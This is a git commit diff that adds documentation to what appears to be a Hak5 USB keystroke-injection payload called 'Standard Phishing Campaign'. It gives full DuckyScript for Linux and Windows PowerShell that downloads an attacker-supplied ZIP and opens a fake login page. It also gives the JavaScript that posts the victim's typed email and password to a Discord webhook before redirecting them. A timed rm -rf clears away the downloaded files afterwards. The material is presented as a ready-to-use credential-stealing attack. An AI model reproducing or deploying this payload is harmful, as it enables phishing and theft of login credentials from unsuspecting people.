UPDATE Documentation

Added documentation on payload usage by operating system.
Added documentation on HTML/JavaScript code and DuckyScript code.
Created the ZIP archive as it should be.
Improved script formatting for the DEFINE variable.
aleff-github 2023-04-26 08:24:42 +02:00
parent 7444b8d927
commit 26853327b0
6 changed files with 285 additions and 25 deletions

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@ -0,0 +1,44 @@
# DuckyScript Documentation
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds.
REM Create a random directory
STRINGLN dir_name=$(mktemp -d)
- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Delete the directory after 60 minutes (3600 seconds)
STRINGLN (sleep 3600 && rm -rf $dir_name) &
- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Move into the directory
STRINGLN cd $dir_name
- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Download the zip from your own link
- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds.
REM Unzip it
STRINGLN unzip file.zip
- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script.
REM Open the login page
STRINGLN xdg-open login.html; exit;

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@ -1,4 +1,4 @@
# Standard Phishing Campaign - Linux ✅
# Standard Phishing Campaign
A script used to exfiltrate the Standard username and password by a phishing campaign.
@ -8,18 +8,183 @@ A script used to exfiltrate the Standard username and password by a phishing cam
A script used to exfiltrate the Standard username and password by a phishing campaign.
Opens a shell, create a tmp directory that will be deleted in 3600 seconds, move into the directory, download your own zip, unzip it, open the login page and close the shell.
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
## Getting Started
This payload was created and tested on Linux but since the HTML markup code and JavaScript language are cross platform it will certainly be usable on machines running Windows or MacOS as well. However, it is essential to modify the DuckyScript script appropriately according to the terminal emulator used (PowerShell for Windows, Shell MacOS for Macs) since the commands are often not the same. To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
### Dependencies
## Payload.txt config - Windows 10/11 - Tested on Windows 11
DELAY 1000
DELAY 1000
STRING powershell
DELAY 2000
STRINGLN do { $dir_name = [IO.Path]::Combine([IO.Path]::GetTempPath(), [IO.Path]::GetRandomFileName()) } while (Test-Path $dir_name)
STRINGLN New-Item -ItemType Directory -Path $dir_name -ErrorAction Stop
STRINGLN Set-Location $dir_name -ErrorAction Stop
STRINGLN Invoke-WebRequest -Uri "#ZIP_LINK" -OutFile file.zip
DELAY 2000
STRINGLN Expand-Archive file.zip
STRINGLN Invoke-Item login.html
## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
DELAY 1000
DELAY 2000
REM Actual script...
# Getting Started
## Dependencies
* Internet Connection
* You own ZIP link
* Discord webhook (or whatever you want to use for the exfiltration)
* Python
* 'ExecutionPolicy Bypass' if used in Windows 10/11
### Executing program
## Settings
* Plug in your device
* Set the Discord wehbook (or whatever you want) into the script.js file at line 3
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
### Settings
* Set the redirect link that you want to use when the payload is sent
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
* Set the Discord wehbook (or whatever you want) into the login.js file at line 3
* Set the ZIP link as described in the payload.txt
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE #ZIP_LINK example.com/file.zip
## JavaScript/HTML Documentation
- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form.
async function send_login() {
// ...
- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes.
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook.
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown.
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
body: JSON.stringify({ content: message })
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method.
// ...
} catch (error) {
// Log any errors to the console
- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form.
<form onsubmit="send_login(); return false;" method="post">
<div class="form-group">
<label for="email">Email:</label>
<input type="email" class="form-control" id="email" placeholder="Insert your email">
<div class="form-group">
<label for="password">Password:</label>
<input type="password" class="form-control" id="password" placeholder="Insert your password">
<button type="submit" class="btn btn-primary">Login</button>
## DuckyScript Documentation
This DuckyScript code performs several actions related to downloading and unzipping a file from a specified link. The script creates a new random directory, downloads a zip file from the specified URL, and unzips it. It also opens a login page.
- First, the script creates a new random directory using the mktemp command and assigns its path to the dir_name variable. The DELAY command is used to pause the script execution for 500 milliseconds.
REM Create a random directory
STRINGLN dir_name=$(mktemp -d)
- Next, the script sets a timer using the sleep command to delete the directory after 60 minutes (3600 seconds). The rm -rf command is used to remove the directory and its contents. The & character is used to run this command in the background, allowing the script to continue running. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Delete the directory after 60 minutes (3600 seconds)
STRINGLN (sleep 3600 && rm -rf $dir_name) &
- The script then moves into the directory using the cd command and the dir_name variable. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Move into the directory
STRINGLN cd $dir_name
- Next, the script downloads the zip file from the specified URL using the curl command. The LOk option is used to download the file and give it the same name as the original file. The #ZIP_LINK placeholder should be replaced with the actual URL of the zip file. Another DELAY command is used to pause the script execution for 500 milliseconds.
REM Download the zip from your own link
- The script then unzips the downloaded file using the unzip command. The DELAY command is used again to pause the script execution for 500 milliseconds.
REM Unzip it
STRINGLN unzip file.zip
- Finally, the script opens the login page using the xdg-open command and the login.html file. The exit command is used to terminate the script.
REM Open the login page
STRINGLN xdg-open login.html; exit;

View File

@ -0,0 +1,55 @@
# JavaScript/HTML Documentation
- This JavaScript code aims to send the credentials entered in an HTML form to a Discord Webhook or any other remote server. The code is written as an asynchronous function named **send_login()**, which is called when the user presses the login button in the HTML form.
async function send_login() {
// ...
- The first thing the code does is to set the **discord_webhook_url** constant to the Discord Webhook URL where the message containing the credentials will be sent. Then, the **email** and **password** values are retrieved from the form input fields using their **id** attributes.
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
// Retrieve data from POST form
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
- After that, a **message** variable is created by concatenating the **email** and **password** values. This message will be sent to the Discord Webhook.
// Create message content
const message = "Email: " + email + " \n " + "Password: " + password;
- The **fetch()** method is used to send an HTTP POST request to the Discord Webhook URL. The request body is a JSON object that contains the **message** content. If the response status is **ok**, the user is redirected to the specified URL, which is set in the **window.location.href** property. Otherwise, a generic error is thrown.
// Send POST request to Discord webhook URL
const response = await fetch(discord_webhook_url, {
method: "POST",
headers: {
"Content-Type": "application/json"
body: JSON.stringify({ content: message })
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error
throw new Error('Generic error!');
- If an error occurs during the execution of the **fetch()** method, it will be caught by the **catch()** block and logged to the console using the **console.error()** method.
// ...
} catch (error) {
// Log any errors to the console
- To use this code, you need to replace the **discord_webhook_url** constant with the actual Discord Webhook URL or the URL of any other remote server that you want to send the message to. You also need to ensure that the **id** attributes of the email and password input fields in the HTML form match the values used in the **getElementById()** method calls. Finally, you need to call the **send_login()** function when the user submits the form.

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@ -10,10 +10,14 @@ REM #############################################
REM Requirements:
REM - Internet Connection
REM - You own ZIP link
REM - Discord webhook (or whatever you want to use for the exfiltration)
REM - Python
REM - 'ExecutionPolicy Bypass' if used in Windows 10/11
REM REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
DEFINE ZIP_LINK example.com/file.zip
DEFINE #ZIP_LINK example.com/file.zip
DELAY 1000
@ -23,34 +27,25 @@ DELAY 2000
REM #### Main SECTION ####
REM Create a random directory
STRING dir_name=$(mktemp -d)
STRINGLN dir_name=$(mktemp -d)
REM Delete the directory after 60 minutes (3600 seconds)
STRING (sleep 3600 && rm -rf $dir_name) &
STRINGLN (sleep 3600 && rm -rf $dir_name) &
REM Move into the directory
STRING cd $dir_name
STRINGLN cd $dir_name
REM Downloa the zip from your own link
STRING curl -LOk "
REM Download the zip from your own link
REM Unzip it
STRING unzip file.zip
STRINGLN unzip file.zip
REM Open the login page
STRING xdg-open login.html; exit;
STRINGLN xdg-open login.html; exit;

View File

@ -19,6 +19,7 @@ async function send_login() {
body: JSON.stringify({ content: message })
if (response.ok) {
// DEFINE the redirect link preferred
window.location.href = "https://www.example.com";
} else {
// Otherwise, throw a generic error